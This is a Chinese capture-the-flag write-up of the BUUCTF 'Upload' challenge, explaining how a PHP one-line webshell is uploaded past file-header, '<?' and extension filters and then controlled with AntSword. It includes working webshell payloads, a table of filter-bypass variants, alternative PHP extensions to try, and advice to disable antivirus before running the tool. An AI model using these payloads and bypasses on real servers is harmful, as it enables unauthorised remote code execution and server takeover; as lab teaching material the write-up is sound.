buuctf [极客大挑战 2019 Upload]
进入靶机,我们看到需要上传图片.
我们正常上传一张真的图片。
发现报错。
于是我们上传一句话木马,新建一个文本文档,里面写入:
<?php @eval($_POST['cmd']); ?>
在改文件后缀名,改成:1.jpg
翻译:不!黑客!你的文件包括了 ‘<?’
服务器拦截 <?,于是我们修改,将文件内容改为:
GIF89a?
<script language="php">eval($_REQUESTT[1]) </script>
文件名还是 1.jpg
上传成功,我们查看他的目录列表。
果然发现了我们上传上去的文件。
我们用蚁剑连接。
结果数据返回为空,说明服务器,没有把我们上传的文件“当成PHP来解析”。
我们需要修改一下文件后缀,经过尝试,我们用phtml,于是文件名改为:1.phtml
接下来我们连接 BP 来修改一下Content-TyPe里面的格式,改为:image/jpeg
改好后,放行。
上传成功,我们连接蚁剑
URL地址:靶机网址/upload/1,phtml (1.phtml 我们的文件名,不固定)
密码:1
连接测试成功后,我们找到根目录,发现 flag
打开这个文件,得到flag 值
1.为什么上传正常的图片要报错,又是怎么确定思路的:
因为服务器判断的依据是 exif-imagetype() 读取文件头。
它读到 GIF89a 就认为是 GIF,不管后面是什么。而我们传真的图片,文件头是 FF D8 FF(JPEG头)。
所以报错,这也是为什么我们想到用一句话木马来解决问题。
2.什么是一句话木马:
一句话木马是一段级短的PHP代码,作用是在服务器上开一个后门。
让你可以远程执行PHP代码,运行系统命令,读写文件,连数据库——相当于拿到了服务器的部分控制权。
3.怎么用运用一句话木马:
连接蚁剑,菜刀这类工具。
在工具里面输入木马文件的URL和密码,工具就会自动把你想执行的命令打包发送给木马,木马在服务器上执行,再把结果返回给你。
4.为什么一句话木马 <?php @eval($_POST['cmd']); ?> 长这样:
(1):<?php ...?> :php代码的标签,告诉服务器这是 PHP代码。
(2):@eval(...) :把括号里的字符串当作 PHP代码来执行。@用来屏蔽报错信息。
(3):$_POST[‘cmd’] :从 HTTP POST请求里获取参数 cmd 的值。
5.本题 <? 被拦截,为什么要把一句话木马改成
GIF89a?
<script language="php">eval($_REQUESTT[1]) </script>:
| 写法 | 区别 | 原因 |
| @eval($_POST['cmd']) | 参数名 cmd | 连接时需要填的密码 |
| eval($_REQUEST[1]) | 参数名 1,无 @ | 参数是数字 1,去掉了错误抑制符 |
| <script> | <?被拦截,用<script>来绕过 | |
| 因为要exif-imagetype() 读取文件头 | 手动添加GIF89a |
6.以后遇到这种情况,怎么写一句话木马:
| 情况 | 怎么写 |
| 没有任何过滤 | <?php @eval($_POST['cmd']); ?> |
| 检测 | <? <script language="php">@eval($_POST['cmd']);</script> |
| 检测文件头 | 开头加 GIF89a 或 FF D8 FF 等图片头 |
| 同时检测两者 | 两者结合:GIF89a + <script language="php">@eval($_POST['cmd']);</script> |
密码建议用 cmd 方便记忆和连接
一句话木马的核心:只要能让服务器执行你传来的任意代码,什么写法都行,不要让公式局限了你的才华。
7.怎么查看一个网址的目录列表:
方法:在URL后面加上文件夹名字 + /
比如:
http://靶机地址/uploads/
http://靶机地址/images/
http://靶机地址/static/
不一定都能打开,只有管理员忘记关掉目录浏览权限的才能看到。
8.为什么把文件后缀名jpg 改为 phtml:
核心原因:服务器没有把你的文件“当成PHP来解析”。
9.上传一个文件到服务器,会不会被当成PHP来解析,取决于一下两点:
(1)文件后缀名:(比如; .php , .phtml , .php3 等)是否在服务器的“PHP解析列表”里
(2)有没有配置文件(如 .user.ini 或 .hatccess)强制让某个后缀被解析成PHP
10.遇到这种改后缀名的,怎么办:
一个一个试
| 后缀 | 说明 |
| .php | 最常见 |
| .phtml | 包含 PHP 代码的 HTML 文件 |
| .php3、.php4、.php5 | 旧版本 PHP 使用的后缀 |
| .phps PHP | 源码文件 |
| .pht | 另一种 PHP 文件 |
11.下载蚁剑(AntSword):
它需要两个部分配合才能工作:一个“核心程序”和一个“启动器”。这两个文件缺一不可。
第一步:下载两个文件
1. 启动器 (Loader):负责启动软件。
· 下载地址:https://github.com/AntSwordProject/AntSword-Loader/releases
· 选哪个:Windows系统通常选择 AntSword-Loader-v4.0.3-win32-x64.zip。如果电脑比较老,也可以试试 win32-ia32 版本。
2. 核心源码 (Source Code):这是蚁剑的“大脑”。
· 下载地址:https://github.com/AntSwordProject/AntSword
· 选哪个:点击页面上的 Code 按钮,然后选择 Download ZIP,把整个源码包下载下来。
第二步:安装与配置
1. 解压:
· 在你电脑的某个纯英文路径下(比如 D:\tools\),把刚才下载的 启动器压缩包 和 核心源码压缩包 都解压到当前文件夹。
2. 整理文件:
· 打开解压出来的启动器文件夹(名字大概是 AntSword-Loader-v4.0.3-win32-x64)。
· 将解压出来的核心源码文件夹(名字大概是 antSword-master)整个移动/拖拽到启动器文件夹里面。
· 完成后,启动器文件夹里应该有一个名为 antSword-master 的子文件夹。
3. 首次运行:
· 在启动器文件夹里,找到 AntSword.exe,双击运行。
· 如果是第一次使用,会弹出一个“初始化”窗口。点击“初始化”按钮,然后在弹出的文件夹选择框中,选中刚刚放进去的 antSword-master 这个文件夹,点击“选择文件夹”。
· 稍等片刻,界面会提示“初始化完成”,软件会自动重启。
第三步:启动与连接
重启后,蚁剑的主界面就出来了。如果系统提示缺少某些组件,让它自动下载安装即可。
12. 如何使用:
(1) 在蚁剑界面空白处右键,选择“添加数据”。
(2)URL地址:填写你上传的木马文件在服务器上的完整网址(例如:http://example.com/shell.phtml)。
(3)连接密码:填写你木马文件中设定的密码(例如 cmd)。
(4)点击“测试连接”,如果提示成功,就点“添加”。然后双击这条记录,就可以管理服务器的文件了。
❗ 重要提示(请务必注意)
1.先关杀毒软件:在解压和运行蚁剑前,请务必暂时关闭 Windows Defender 或其他杀毒软件,并把蚁剑所在的文件夹加入白名单。因为这类工具的行为特征和病毒很像,会被杀毒软件直接删除或拦截。
2.路径不要有中文:确保整个蚁剑的文件夹路径(比如 D:\tools\AntSword)没有任何中文字符或空格,否则可能无法正常启动。
3.使用蚁剑时,可能会出现报错提示。原因可能是网络问题,不要连校园网!!!